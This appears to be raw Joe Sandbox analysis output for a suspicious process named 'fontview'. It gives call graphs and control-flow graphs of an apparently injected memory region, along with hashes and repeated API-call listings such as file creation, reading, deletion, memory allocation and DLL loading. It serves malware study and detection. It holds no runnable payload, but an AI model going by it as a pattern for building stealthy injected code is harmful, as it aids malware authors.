82117 302c7e0 82118 302b6e0 RtlFreeHeap 82117->82118 82119 302c7f5 82118->82119 82120 3013223 82121 3017e70 2 API calls 82120->82121 82122 3013233 82121->82122 82123 3029600 NtClose 82122->82123 82124 301324f 82122->82124 82123->82124 82125 3010f2b PostThreadMessageW 82126 3010f3d 82125->82126 82127 301f970 82128 301f9d4 82127->82128 82129 30163c0 2 API calls 82128->82129 82131 301fb07 82129->82131 82130 301fb0e 82131->82130 82156 30164d0 82131->82156 82133 301fcb3 82134 301fcc2 82136 3029600 NtClose 82134->82136 82135 301fb8a 82135->82133 82135->82134 82160 301f750 82135->82160 82139 301fccc 82136->82139 82138 301fbc6 82138->82134 82140 301fbd1 82138->82140 82141 302b7c0 RtlAllocateHeap 82140->82141 82142 301fbfa 82141->82142 82143 301fc03 82142->82143 82144 301fc19 82142->82144 82145 3029600 NtClose 82143->82145 82169 301f640 CoInitialize 82144->82169 82147 301fc0d 82145->82147 82148 301fc27 82172 30290d0 82148->82172 82150 301fca2 82151 3029600 NtClose 82150->82151 82152 301fcac 82151->82152 82153 302b6e0 RtlFreeHeap 82152->82153 82153->82133 82154 301fc45 82154->82150 82155 30290d0 LdrInitializeThunk 82154->82155 82155->82154 82157 30164f5 82156->82157 82176 3028f60 82157->82176 82161 301f76c 82160->82161 82162 3014650 LdrLoadDll 82161->82162 82164 301f78a 82162->82164 82163 301f793 82163->82138 82164->82163 82165 3014650 LdrLoadDll 82164->82165 82166 301f85e 82165->82166 82167 3014650 LdrLoadDll 82166->82167 82168 301f8bb 82166->82168 82167->82168 82168->82138 82171 301f6a5 82169->82171 82170 301f73b CoUninitialize 82170->82148 82171->82170 82173 30290ea 82172->82173 82181 5012ba0 LdrInitializeThunk 82173->82181 82174 302911a 82174->82154 82177 3028f7a 82176->82177 82180 5012c60 LdrInitializeThunk 82177->82180 82178 3016569 82178->82135 82180->82178 82181->82174 82183 3017230 82184 301724c 82183->82184 82188 301729f 82183->82188 82186 3029600 NtClose 82184->82186 82184->82188 82185 30173d7 82187 3017267 82186->82187 82193 3016650 NtClose LdrInitializeThunk LdrInitializeThunk 82187->82193 82188->82185 82194 3016650 NtClose LdrInitializeThunk LdrInitializeThunk 82188->82194 82190 30173b1 82190->82185 82195 3016820 NtClose LdrInitializeThunk LdrInitializeThunk 82190->82195 82193->82188 82194->82190 82195->82185 82196 3015cb0 82197 30181f0 LdrInitializeThunk 82196->82197 82198 3015ce0 82196->82198 82197->82198 82201 3018170 82198->82201 82200 3015d05 82202 30181b4 82201->82202 82203 30181d5 82202->82203 82208 3028920 82202->82208 82203->82200 82205 30181c5 82206 30181e1 82205->82206 82207 3029600 NtClose 82205->82207 82206->82200 82207->82203 82209 302899a 82208->82209 82211 302894b 82208->82211 82213 5014650 LdrInitializeThunk 82209->82213 82210 30289bf 82210->82205 82211->82205 82213->82210 82214 3020270 82215 3020293 82214->82215 82216 3014650 LdrLoadDll 82215->82216 82217 30202b7 82216->82217

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 95 3009e80-300a0e0 96 300a0ea-300a0ee 95->96 97 300a0f0-300a114 96->97 98 300a116-300a11d 96->98 97->96 99 300a14e-300a155 98->99 100 300a11f-300a14c 98->100 101 300a181-300a18f 99->101 102 300a157-300a17f 99->102 100->98 103 300a19a-300a1a3 101->103 102->99 104 300a1a5-300a1b7 103->104 105 300a1b9-300a1c9 103->105 104->103 105->105 106 300a1cb-300a1cf 105->106 108 300a1d1-300a1fb 106->108 109 300a1fd-300a204 106->109 108->106 110 300a20f-300a218 109->110 111 300a21a-300a229 110->111 112 300a22b 110->112 111->110 113 300a232-300a238 112->113 115 300a254 113->115 116 300a23a-300a252 113->116 117 300a25b-300a262 115->117 116->113 118 300a294-300a29b 117->118 119 300a264-300a292 117->119 120 300a2a6-300a2af 118->120 119->117 121 300a2b1-300a2bb 120->121 122 300a2bd-300a2c6 120->122 121->120 124 300a2c8-300a2e9 122->124 125 300a2eb-300a2f4 122->125 124->122 126 300a3f9-300a400 125->126 127 300a2fa-300a2fe 125->127 128 300a402-300a408 126->128 129 300a45e-300a465 126->129 130 300a300-300a317 127->130 131 300a319-300a329 127->131 132 300a40a-300a41c 128->132 133 300a41e call 302b340 128->133 134 300a470-300a476 129->134 130->127 135 300a334-300a338 131->135 132->128 146 300a423-300a42a 133->146 139 300a478-300a481 134->139 140 300a48e-300a495 134->140 136 300a355-300a364 135->136 137 300a33a-300a353 135->137 143 300a366 136->143 144 300a36b-300a371 136->144 137->135 147 300a483-300a489 139->147 148 300a48c 139->148 141 300a497-300a4ba 140->141 142 300a4bc-300a4c6 140->142 141->140 149 300a4c8-300a4e7 142->149 150 300a4fa-300a504 142->150 143->126 151 300a375-300a381 144->151 146->129 152 300a42c-300a442 146->152 147->148 148->134 154 300a4f8 149->154 155 300a4e9-300a4f2 149->155 156 300a3a0-300a3aa 151->156 157 300a383-300a39e 151->157 158 300a444-300a44c 152->158 159 300a44e-300a459 152->159 154->142 155->154 161 300a3e2-300a3f2 156->161 162 300a3ac-300a3c7 156->162 157->151 160 300a45c 158->160 159->160 160->146 161->161 165 300a3f4 161->165 163 300a3c9-300a3cd 162->163 164 300a3ce-300a3d0 162->164 163->164 166 300a3e0 164->166 167 300a3d2-300a3da 164->167 165->125 166->156 167->166
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: &;$&X$07$5T$;s$A$Kj$Z$_QlVKj$e$oa$~$~D$X$d
                                                                                    • API String ID: 0-3847398102
                                                                                    • Opcode ID: 258605563252ec02880893b3bc2e24088d5aed0290a2bd5645d4f2ebb6d941fd
                                                                                    • Instruction ID: f15a949842c930cfb1f799710c2055f5484ed941807f6a1280596bd42b984808
                                                                                    • Opcode Fuzzy Hash: 258605563252ec02880893b3bc2e24088d5aed0290a2bd5645d4f2ebb6d941fd
                                                                                    • Instruction Fuzzy Hash: B012F5B0E06229CFEB24CF98C8947EDBBB1FF44308F148199D509AB281D7795A85CF55
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(?,00000000), ref: 0301C7E4
                                                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 0301C81F
                                                                                    • FindClose.KERNELBASE(?), ref: 0301C82A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                    • String ID:
                                                                                    • API String ID: 3541575487-0
                                                                                    • Opcode ID: 140c45ad7ed1789373bcfe2a44afe739e1a5bcbcc8990cb583f84032add19790
                                                                                    • Instruction ID: a52e16939ac4587c664301f2cbbf0544fba606cf1e2fb2999ab132e915e72c93
                                                                                    • Opcode Fuzzy Hash: 140c45ad7ed1789373bcfe2a44afe739e1a5bcbcc8990cb583f84032add19790
                                                                                    • Instruction Fuzzy Hash: 9831B6B5941308BBEB24DFA4CC85FEF77BC9F85744F144058B908AB1C0D6B0AA95CBA1
                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 030293FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 34b98089489fcee320466ab6707d416bb4d5332a27b35b02a639f2c190a2acc1
                                                                                    • Instruction ID: 41f35fba331b95ca723f0ea76615d04af45579c2907c977bd3f7f0d637e4984e
                                                                                    • Opcode Fuzzy Hash: 34b98089489fcee320466ab6707d416bb4d5332a27b35b02a639f2c190a2acc1
                                                                                    • Instruction Fuzzy Hash: 893195B5A01608AFDB54DF99D881EDEBBF9EF8C314F108119FD18A7340D630A951CBA5
                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 03029556
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: 20c90b30256ad246525526b73c38bcb6b8b33cb5b389bbf1a347d5acf39c0346
                                                                                    • Instruction ID: 5bb722cc3d6a4121d0eeb8ed3e616335ffd728cad1fda85c4e0d6075a08587a7
                                                                                    • Opcode Fuzzy Hash: 20c90b30256ad246525526b73c38bcb6b8b33cb5b389bbf1a347d5acf39c0346
                                                                                    • Instruction Fuzzy Hash: 6B31C9B5A01608AFDB14DF98D880EDFBBF9EF88314F108219FD18A7340D630A951CBA5
                                                                                    APIs
                                                                                    • NtAllocateVirtualMemory.NTDLL(03011EBE,?,030280FF,00000000,00000004,00003000,?,?,?,?,?,030280FF,03011EBE,BE8D4F4E,03011EBE,00000000), ref: 03029838
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2167126740-0
                                                                                    • Opcode ID: 7135e00bcafa40e88fa395f011b7bd0db920fceb8b0d479973e0ed4ab716e7fc
                                                                                    • Instruction ID: 7c1fc96d61f36a6e9bd152b4619a815fdd24a765cace8bd98316fb243ab26220
                                                                                    • Opcode Fuzzy Hash: 7135e00bcafa40e88fa395f011b7bd0db920fceb8b0d479973e0ed4ab716e7fc
                                                                                    • Instruction Fuzzy Hash: 8221FF75A01609AFDB14DF98DC81EEF7BB9EF88310F108109FD18A7240D770A951CBA1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteFile
                                                                                    • String ID:
                                                                                    • API String ID: 4033686569-0
                                                                                    • Opcode ID: 4a3721d8a29282ed27fe08d4f1e735d741e64edec40d4e9b22e22086d4773e89
                                                                                    • Instruction ID: 02b0240bd6641d044055a76f01ffc85aca2953ee83a72febf25ba215f42fcb8c
                                                                                    • Opcode Fuzzy Hash: 4a3721d8a29282ed27fe08d4f1e735d741e64edec40d4e9b22e22086d4773e89
                                                                                    • Instruction Fuzzy Hash: BB115E79A027187BD620EB54CC41FEB7BACDF85714F108149F9186B280DA706955CBA1
                                                                                    APIs
                                                                                    • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03029634
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: 4e38c00dae261bef75bf053dafa103ddf5257f9c4bce10d2ce9fad77e1b094bc
                                                                                    • Instruction ID: 2254583ff08fc59d38ad05c84cb278b9f8e99881747604b721d637ee624e23d7
                                                                                    • Opcode Fuzzy Hash: 4e38c00dae261bef75bf053dafa103ddf5257f9c4bce10d2ce9fad77e1b094bc
                                                                                    • Instruction Fuzzy Hash: 63E04F3A2012147BD210EA59DC40FDB776CDBC6750F108019FA1C6B140CA70B90187F0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 81b5211f1844a1d2689e5106e65798286d405b872eb7227c8fee7b05a8812b57
                                                                                    • Instruction ID: cc7892d7d8ce50fa54d0286c2a2753e8ef875087ec0140f5a5ce9f7eb40853f7
                                                                                    • Opcode Fuzzy Hash: 81b5211f1844a1d2689e5106e65798286d405b872eb7227c8fee7b05a8812b57
                                                                                    • Instruction Fuzzy Hash: 2290023660561402E1007158955570A10158BD0201FA5C412A0424568D8B958A5165A2
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f3a1044409e1c979311a8daa904e034c0f6268150e72a059d0a6cfb3df6e6ce3
                                                                                    • Instruction ID: 2e905062992ac01b088a7bf84ea5c9ef8e45bd94f85a7eda2d3026aa8a79a24d
                                                                                    • Opcode Fuzzy Hash: f3a1044409e1c979311a8daa904e034c0f6268150e72a059d0a6cfb3df6e6ce3
                                                                                    • Instruction Fuzzy Hash: EC9002666016104251407158984540A60159BE13013D5C116A0554560C8A1889559269
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 30a192af3670ed123c4d39cc1646db8c269271e26e96b5fe31a452c532608451
                                                                                    • Instruction ID: 34549410ceff239aae992450ff3cbef7ba6fa35a323b4caefc494e668b17da75
                                                                                    • Opcode Fuzzy Hash: 30a192af3670ed123c4d39cc1646db8c269271e26e96b5fe31a452c532608451
                                                                                    • Instruction Fuzzy Hash: 7D90023660591012A140715898C554A40159BE0301B95C012E0424554C8E148A565361
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 0e31ab62774b2faab1bf5a7df7143caf8e4fbd80dcb76733b17ddaa059fb1ee5
                                                                                    • Instruction ID: 90313492260e1a5c902c5e9603005ba52fd5cda4b104bba49217ddcda4d69162
                                                                                    • Opcode Fuzzy Hash: 0e31ab62774b2faab1bf5a7df7143caf8e4fbd80dcb76733b17ddaa059fb1ee5
                                                                                    • Instruction Fuzzy Hash: 9290022E21351002E1807158A44960E00158BD1202FD5D416A0015558CCD1589695321
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: e51139722c97b769a80c8bd9e5d09a5e024b9728e4d297e9401cb76debb6455b
                                                                                    • Instruction ID: 1d6e084779e21815a03a26dfc4f137586ec306424a53a9c4a02c760836d6f4bd
                                                                                    • Opcode Fuzzy Hash: e51139722c97b769a80c8bd9e5d09a5e024b9728e4d297e9401cb76debb6455b
                                                                                    • Instruction Fuzzy Hash: 0990022630151003E1407158A45960A4015DBE1301F95D012E0414554CDD1589565222
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 35d1d8e7c2f2d632ae9fba217aa83944011d8b8bbe61613b37a87eaf5361af36
                                                                                    • Instruction ID: 5d5fa3e68724da8dcf39217ecedda7ed22710de830f555779d5edc46c10627d6
                                                                                    • Opcode Fuzzy Hash: 35d1d8e7c2f2d632ae9fba217aa83944011d8b8bbe61613b37a87eaf5361af36
                                                                                    • Instruction Fuzzy Hash: 12900226242551526545B158944550B40169BE02417D5C013A1414950C89269956D621
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: ce39129ffd611ea90b6d2c4c1f8b3ac9e243c1b79ae370b7620f805d7defa91e
                                                                                    • Instruction ID: 2b154952098a8c3b25afb2f61ac5ac282df9d18ef3048d66fc9deb4d31a6bb60
                                                                                    • Opcode Fuzzy Hash: ce39129ffd611ea90b6d2c4c1f8b3ac9e243c1b79ae370b7620f805d7defa91e
                                                                                    • Instruction Fuzzy Hash: 0A90023620151413E1117158954570B00198BD0241FD5C413A0424558D9A568A52A121
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 0164a253fc18d4b248cc68815092e56f6b7b0dd8326c8456662303c6aee06ae0
                                                                                    • Instruction ID: 33f6bca52d63e1af130e9ff2aaed6bfea7386526c01a68aec7af872daaa7a708
                                                                                    • Opcode Fuzzy Hash: 0164a253fc18d4b248cc68815092e56f6b7b0dd8326c8456662303c6aee06ae0
                                                                                    • Instruction Fuzzy Hash: 7790023620151842E10071589445B4A00158BE0301F95C017A0124654D8A15C9517521
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: cdf9732a41807cb4fcb298dc67b1c68c253e82810e2aa542a933443c3338bff8
                                                                                    • Instruction ID: 6c303d607ef8a5cf13854fff66d430da7dc649a308d7df7f6b3651aed1eed925
                                                                                    • Opcode Fuzzy Hash: cdf9732a41807cb4fcb298dc67b1c68c253e82810e2aa542a933443c3338bff8
                                                                                    • Instruction Fuzzy Hash: 7590023620159802E1107158D44574E00158BD0301F99C412A4424658D8A9589917121
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 7065fe7f38cee76aecfbd093b35a625e83709e9164b9d4b58b24771c7cfddd85
                                                                                    • Instruction ID: 1ad0f8c07602d85f7e793acdffd17503200b4fa9bd4bb8182facd57a57dc07e2
                                                                                    • Opcode Fuzzy Hash: 7065fe7f38cee76aecfbd093b35a625e83709e9164b9d4b58b24771c7cfddd85
                                                                                    • Instruction Fuzzy Hash: 0790023620151402E1007598A44964A00158BE0301F95D012A5024555ECA6589916131
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 0f2ae7e80385de261a9f5cd1607f5aa517048a604be5b7097621248c281f0f41
                                                                                    • Instruction ID: 2440d87ac2a820b45e72d50dad2e0d8f799aa80f32d9e2d0230b8f7171e2f00a
                                                                                    • Opcode Fuzzy Hash: 0f2ae7e80385de261a9f5cd1607f5aa517048a604be5b7097621248c281f0f41
                                                                                    • Instruction Fuzzy Hash: 4690026634151442E10071589455B0A0015CBE1301F95C016E1064554D8A19CD526126
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 64474def207667c8075acef5098065f9f7a736bc73bef1d3c00c6af12d4a0c33
                                                                                    • Instruction ID: 416b8e5d583ecc8ef3c9e7d451b815eca03ed6d612a01cfb23b6dbb0dea317fc
                                                                                    • Opcode Fuzzy Hash: 64474def207667c8075acef5098065f9f7a736bc73bef1d3c00c6af12d4a0c33
                                                                                    • Instruction Fuzzy Hash: 8B9002266015104251407168D88590A4015AFE1211795C122A0998550D895989655665
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 5ac536fc2e9df6207c4527476b3ecb552cab8a1a5cbcab507164ac570cd0fbb4
                                                                                    • Instruction ID: f4e037c10e382e16a938a5088bd41ea6c092f607759900ae69a48d4e944d5520
                                                                                    • Opcode Fuzzy Hash: 5ac536fc2e9df6207c4527476b3ecb552cab8a1a5cbcab507164ac570cd0fbb4
                                                                                    • Instruction Fuzzy Hash: 55900226211D1042E20075689C55B0B00158BD0303F95C116A0154554CCD1589615521
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
